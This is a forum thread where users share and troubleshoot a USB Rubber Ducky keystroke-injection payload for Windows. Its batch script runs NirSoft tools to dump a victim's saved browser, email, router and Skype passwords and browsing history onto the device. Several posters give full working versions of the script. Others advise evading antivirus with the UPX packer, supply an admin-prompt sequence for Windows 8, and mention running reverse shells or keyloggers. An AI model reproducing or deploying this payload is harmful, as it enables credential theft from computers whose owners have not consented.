mrgray Posted March 17, 2013 Share Posted March 17, 2013 (edited) (Not my responsibility what you do with these programs) Update! ------------------------------------------------------------------------------------------------------------------------------------ Thanks to Overwraith, new credit goes to him and the people who helped! ------------------------------------------------------------------------------------------------------------------------------------ Also posted in the github page https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---mrgray%27s-rubber-hacks -------------------------------------------- Payload mrgray's rubber hacks The following is a modified version of Mr Gray's password recovery script for the USB rubber ducky. Modifications include googleKnowsBest's ducky drive detection if the drive is labeled "DUCKY", which has been coded to work on all current windows OS's, and a modification to run from a folder on the ducky labeled "MrGraysRubberHacks". This payload has also been tweaked to be a little more forgiving to errors, and as such has some more delays. Forgiving as this script is, it may need customized delays depending on the users requirements. The payload is designed for c_duck_v2_S001.hex, and c_duck_v2_S002.hex firmware types. Wait for the ducky's drive to mount, and then press the button to launch this payload. This payload may also be launched using a binary duck attack in which you use stock duck firmware, linked to a mass storage device via a 2 port USB cable splitter. This method would mount the mass storage almost instantaneously which would negate the need to wait for the ducky's mass storage to mount. The forum page is located here: http://forums.hak5.org/index.php?/topic/29067-payload-mr-grays-password-history-recovery-tool-for-rubber-ducky/ The executables are accessible at: http://www.mediafire.com/?nm1c62qt9w9z3wg The executables are also individually downloadable from their original location at nirsoft. The executables become resistant to most antivirus detection using the packer UPX. Other such products would further obfuscate the signatures. ENCODE: DEFAULT_DELAY 25REM File: MrGraysRubberHacks.txtREM Target: WINDOWS VISTA/7DELAY 1000ESCAPECONTROL ESCAPEDELAY 100STRING cmdDELAY 100ENTERDELAY 150STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A :)ENTERSTRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacksENTERSTRING %DUCKYdrive%\launch.batENTERLAUNCH.BAT file:for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A :)REM Output everything to this folder so I don't have everything on the duck's root.set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacksstart %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txtstart %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txtstart %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txtstart %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txtstart %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txtstart %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txtstart %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txtstart %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txtstart %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txtstart %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txtstart %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txtstart %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txtstart %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt If you wish to remove the part of the script that contains the code to the folder MrGraysRubberHacks, and instead have all output go to the root of the drive delete the following items: ENCODE:...STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacksENTER... LAUNCH.BAT file:...REM Output everything to this folder so I dont have everything on the duck's root.set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks... =========================================================================================== Old setup, out of date somewhat. =========================================================================================== Must have twine duck! I made the code but not the programs, you can create your own setup or download the .exe's from there. http://www.nirsoft.net/ Some of the programs will be flagged as hacking tools etc, if you don't feel safe with my files just download it from NirSoft. It will create text documents in your D drive which is the ducky drive from the Launch.bat file i made. --------------------------------------------------------------------------------------------------------------- Source files --------------------------------------------------------------------------------------------------------------- ENCODE: DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 100 STRING cmd DELAY 100 ENTER DELAY 100 STRING d:\launch.bat ENTER --------------------------------------------------------------------------------------------------------------- Launch.bat file: start D:\WebBrowserPassView.exe /stext D:\WebBrowserPassView.txt start D:\SkypeLogView.exe /stext D:\SkypeLogView.txt start D:\RouterPassView.exe /stext D:\RouterPassView.txt start D:\pspv.exe /stext D:\pspv.txt start D:\PasswordFox.exe /stext D:\PasswordFox.txt start D:\OperaPassView.exe /stext D:\OperaPassView.txt start D:\mspass.exe /stext D:\mspass.txt start D:\mailpv.exe /stext D:\mailpv.txt start D:\iepv.exe /stext D:\iepv.txt start D:\ChromePass.exe /stext D:\ChromePass.txt start D:\ChromeHistoryView.exe /stext D:\ChromeHistoryView.txt start D:\BulletsPassView.exe /stext D:\BulletsPassView.txt start D:\BrowsingHistoryView.exe /stext D:\BrowsingHistoryView.txt exit --------------------------------------------------------------------------------------------------------------- Its pretty simple and its still in beta so re-code to you liking and i only made the source codes. Again do NOT say i am spreading viruses, Download it from the website and they will be the same codes. The list of the programs i used is right above the paragraph. --------------------------------------------------------------------------------------------------------------- Download my files http://www.mediafire.com/?nm1c62qt9w9z3wg --------------------------------------------------------------------------------------------------------------- Hope you like my sources! Edited June 30, 2013 by mrgray Quote Link to comment Share on other sites More sharing options...
overwraith Posted March 18, 2013 Share Posted March 18, 2013 I haven't run the following, but a couple alterations should make it so that it dynamically finds a drive on the ducky labeled "ducky." ENCODE: DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 100 STRING cmd DELAY 100 ENTER DELAY 100 STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d ENTER STRING %myd%\launch.bat ENTER Launch.bat file: for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d start %myd%\WebBrowserPassView.exe /stext %myd%\WebBrowserPassView.txt start %myd%\SkypeLogView.exe /stext %myd%\SkypeLogView.txt start %myd%\RouterPassView.exe /stext %myd%\RouterPassView.txt start %myd%\pspv.exe /stext %myd%\pspv.txt start %myd%\PasswordFox.exe /stext %myd%\PasswordFox.txt start %myd%\OperaPassView.exe /stext %myd%\OperaPassView.txt start %myd%\mspass.exe /stext %myd%\mspass.txt start %myd%\mailpv.exe /stext %myd%\mailpv.txt start %myd%\iepv.exe /stext %myd%\iepv.txt start %myd%\ChromePass.exe /stext %myd%\ChromePass.txt start %myd%\ChromeHistoryView.exe /stext %myd%\ChromeHistoryView.txt start %myd%\BulletsPassView.exe /stext %myd%\BulletsPassView.txt start %myd%\BrowsingHistoryView.exe /stext %myd%\BrowsingHistoryView.txt exit Quote Link to comment Share on other sites More sharing options...
mrgray Posted March 18, 2013 Author Share Posted March 18, 2013 (edited) I haven't run the following, but a couple alterations should make it so that it dynamically finds a drive on the ducky labeled "ducky." Thanks man i posted it on the main post, haven't tried it yet. Edited March 18, 2013 by mrgray Quote Link to comment Share on other sites More sharing options...
skysploit Posted March 31, 2013 Share Posted March 31, 2013 (edited) This is good stuff... Kudos mrgray! Have you guys been getting dinged by Anti-Virus for running this payload? Edited March 31, 2013 by skysploit Quote Link to comment Share on other sites More sharing options...
googleknowsbest Posted April 2, 2013 Share Posted April 2, 2013 (edited) This command does not work on older Windows computers like XP or 2000, any edition without wmic. for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d I am happy to say I found a command to work on all Windows enviorments, even fresh installs, to find the drive letter. I am the one asking for help in this form http://www.computerhope.com/forum/index.php/topic,136690.0.html And here is my answer: for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) To use this in the batch file change each line to follow suit. start %DUCKYdrive%\X.exe /stext %DUCKYdrive%\X.txt You should update this on your post for it is compatable on computers without wmic even if it does! Also this should be a sticky topic. Here you go: ENCODE: DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 100 STRING cmd DELAY 100 ENTER DELAY 100 STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) DELAY 175 ENTER DELAY 25 ENTER STRING %DUCKYdrive%\launch.bat ENTER Launch.bat file: for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt exit Edited April 6, 2013 by googleknowsbest Quote Link to comment Share on other sites More sharing options...
Iamscanner Posted April 6, 2013 Share Posted April 6, 2013 ^^Does the above script work in windows 8? Quote Link to comment Share on other sites More sharing options...
skysploit Posted April 6, 2013 Share Posted April 6, 2013 I would imagine that it would work. However, it would require you to change the way you access the command prompt... Here's what I use to pull up cmd as an admin on Windows 8. Of course you can speed it up if you would like. I have this setup for reliability. DELAY 5000 GUI q DELAY 400 STRING cmd DELAY 400 MENU DELAY 300 RIGHTARROW DELAY 300 RIGHTARROW DELAY 300 RIGHTARROW DELAY 300 ENTER DELAY 600 ALT y DELAY 800 Quote Link to comment Share on other sites More sharing options...
Iamscanner Posted April 7, 2013 Share Posted April 7, 2013 ^Thanks for the inf, going to play around with it today (been walking around town with interceptor -ng for Android (great app btw). Will report back if I have any luck Quote Link to comment Share on other sites More sharing options...
Goddish Posted April 7, 2013 Share Posted April 7, 2013 Nirsoft is detected by every AV available, there are a few other commandline apps that are fully undetected that will export password lists into text files. Quote Link to comment Share on other sites More sharing options...
googleknowsbest Posted April 25, 2013 Share Posted April 25, 2013 Try UPX packager. I can avoid detection from Norton 2013 unless I open up the duck's directory. I dont have issues with AV. My fav. Thing about this post is to run exe's off it! That means the world to me, you can execute a reverse shell, keylogger, or trolling! C++ programers ftw! Arch Linux ftw too! Quote Link to comment Share on other sites More sharing options...
mrgray Posted May 30, 2013 Author Share Posted May 30, 2013 Thanks for all y'alls reply's! Great work! :) Quote Link to comment Share on other sites More sharing options...
mahorelee Posted June 24, 2013 Share Posted June 24, 2013 When I try and run it I always get "The system can not find the path specified". I tried changing Launch.bat to Launch.exe and still the same problem. What am I doing wrong? Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 27, 2013 Share Posted June 27, 2013 Make sure you have the right firmware installed, I would recommend c_duck_v2_s002.hex from https://code.google.com/p/ducky-decode/ on the download page. This firmware if installed correctly will launch the payload when the ducky trigger is pressed. Wait for the removable media to mount to the computer, then launch the payload. If the removable media is not mounted when the payload is launched, it will not execute correctly. Quote Link to comment Share on other sites More sharing options...
odnorazovaya Posted June 28, 2013 Share Posted June 28, 2013 When I try and run it I always get "The system can not find the path specified". I tried changing Launch.bat to Launch.exe and still the same problem. What am I doing wrong? same here. tried both overwraith's and googleknowsbest's versions. getting the same error over and over. please, any suggestions anyone? Quote Link to comment Share on other sites More sharing options...
odnorazovaya Posted June 28, 2013 Share Posted June 28, 2013 Make sure you have the right firmware installed, I would recommend c_duck_v2_s002.hex from https://code.google.com/p/ducky-decode/ on the download page. This firmware if installed correctly will launch the payload when the ducky trigger is pressed. Wait for the removable media to mount to the computer, then launch the payload. If the removable media is not mounted when the payload is launched, it will not execute correctly. C:\Users\MY_User>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=% d 'wmic' is not recognized as an internal or external command, operable program or batch file. C:\Users\MY_User>%myd%\launch.bat The system cannot find the path specified. this the actual error im getting... Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 28, 2013 Share Posted June 28, 2013 If you all are still having errors, post what operating system you are using, and what firmware you have installed. I cannot make bricks without clay. Quote Link to comment Share on other sites More sharing options...
odnorazovaya Posted June 29, 2013 Share Posted June 29, 2013 If you all are still having errors, post what operating system you are using, and what firmware you have installed. I cannot make bricks without clay. our bad,. i have rested on 2 machines win 7 64 - ultimate win7 32 - proffesional. on win7 32 pro - it gave me a slighttly different error, just saying that path isnt found. the error i have posted is from win7 64- ultimate. as per your suggestion i have flashed to c_duck_v2_S002(haven't tried any other) , waited until it said that DUCKY(WHATEVER DRIVE:) is mounted, an triggered the payload. the same result over and over. googleknowsbest's version gives the same error. thanks Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 29, 2013 Share Posted June 29, 2013 (edited) I think I have found what is making the script backfire. The script is executing too fast, and the computer is not able to catch the first % character in the string "%myd%\launch.bat". Am working on a more error resistant script. Edited June 29, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
overwraith Posted June 29, 2013 Share Posted June 29, 2013 (edited) Here is what I have come up with. I am using the googleknowsbest script, as I am a fan of scripts that run on all Windows environments. I also added logic to contain all the output in a folder called MrGraysRubberHacks so the root of my duck is not all crowded. I have also observed something, when the loop is engaged in the command prompt, there is a sizable delay, but the command prompt appears to have a buffer that catches any subsequent keystrokes, so there is no problem with the execution of the script. ENCODE: DEFAULT_DELAY 25 REM File: MrGraysRubberHacks.txt REM Target: WINDOWS VISTA/7 DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 100 STRING cmd DELAY 100 ENTER DELAY 150 STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ENTER STRING %DUCKYdrive%\launch.bat ENTER LAUNCH.BAT file: for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) REM Output everything to this folder so I dont have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt If you wish to remove the part of the script that contains the code to the folder MrGraysRubberHacks, and instead have all output go to the root of the drive delete the following items: ENCODE: ... STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ENTER ... LAUNCH.BAT file: ... REM Output everything to this folder so I dont have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ... Edited June 29, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
odnorazovaya Posted June 29, 2013 Share Posted June 29, 2013 Here is what I have come up with. I am using the googleknowsbest script, as I am a fan of scripts that run on all Windows environments. I also added logic to contain all the output in a folder called MrGraysRubberHacks so the root of my duck is not all crowded. I have also observed something, when the loop is engaged in the command prompt, there is a sizable delay, but the command prompt appears to have a buffer that catches any subsequent keystrokes, so there is no problem with the execution of the script. ENCODE: DEFAULT_DELAY 25 REM File: MrGraysRubberHacks.txt REM Target: WINDOWS VISTA/7 DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 100 STRING cmd DELAY 100 ENTER DELAY 150 STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ENTER STRING %DUCKYdrive%\launch.bat ENTER LAUNCH.BAT file: for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) REM Output everything to this folder so I dont have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt If you wish to remove the part of the script that contains the code to the folder MrGraysRubberHacks, and instead have all output go to the root of the drive delete the following items: ENCODE: ... STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ENTER ... LAUNCH.BAT file: ... REM Output everything to this folder so I dont have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ... getting my hands on it now, will let you know how it went after testing this on couple PC's. thanks for your time and effort. Quote Link to comment Share on other sites More sharing options...
odnorazovaya Posted June 29, 2013 Share Posted June 29, 2013 C:\Users\My_Username>for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)'diskpart' is not recognized as an internal or external command,operable program or batch file.C:\Users\My_Username>set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacksC:\Users\My_Username>%DUCKYdrive%\launch.batThe system cannot find the path specified.C:\Users\My_Username> Used the same c_duck_v2_S002 firmware, could only test it on Win 7 64 Ultimate, dont have any other machine around at the moment. Seems like it's having some issues executing diskpart this time. Quote Link to comment Share on other sites More sharing options...
odnorazovaya Posted June 30, 2013 Share Posted June 30, 2013 Here is what I have come up with. I am using the googleknowsbest script, as I am a fan of scripts that run on all Windows environments. I also added logic to contain all the output in a folder called MrGraysRubberHacks so the root of my duck is not all crowded. I have also observed something, when the loop is engaged in the command prompt, there is a sizable delay, but the command prompt appears to have a buffer that catches any subsequent keystrokes, so there is no problem with the execution of the script. ENCODE: DEFAULT_DELAY 25 REM File: MrGraysRubberHacks.txt REM Target: WINDOWS VISTA/7 DELAY 1000 ESCAPE CONTROL ESCAPE DELAY 100 STRING cmd DELAY 100 ENTER DELAY 150 STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:) ENTER STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ENTER STRING %DUCKYdrive%\launch.bat ENTER LAUNCH.BAT file: for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) REM Output everything to this folder so I dont have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt If you wish to remove the part of the script that contains the code to the folder MrGraysRubberHacks, and instead have all output go to the root of the drive delete the following items: ENCODE: ... STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ENTER ... LAUNCH.BAT file: ... REM Output everything to this folder so I dont have everything on the duck's root. set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks ... hey, overwraith, can you take a look at the output of your last version code, i have posted it earlier. I have also just tested it on Win 7 32 bit Pro too, it gives access denied error... so its 2 different errors on different OSs, but both are DISKPART related. I don't think the all Win version is going to happen. Any ideas for a workaround at least for Win 7 and later machines? Quote Link to comment Share on other sites More sharing options...
mrgray Posted June 30, 2013 Author Share Posted June 30, 2013 Main post Updated!Many thanks to overwraith! Credit goes to him and people who helped! If you have your own version of the codding please post it, i will not take credit from your own work. I'm looking at doing more coding and hard mods soon. Just been super busy! Quote Link to comment Share on other sites More sharing options...
googleknowsbest Posted September 19, 2013 Share Posted September 19, 2013 Hope you guys like the script! Quote Link to comment Share on other sites More sharing options...
bigkielbasapl Posted January 12, 2014 Share Posted January 12, 2014 Nirsoft is detected by every AV available, there are a few other commandline apps that are fully undetected that will export password lists into text files. can you please share those? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.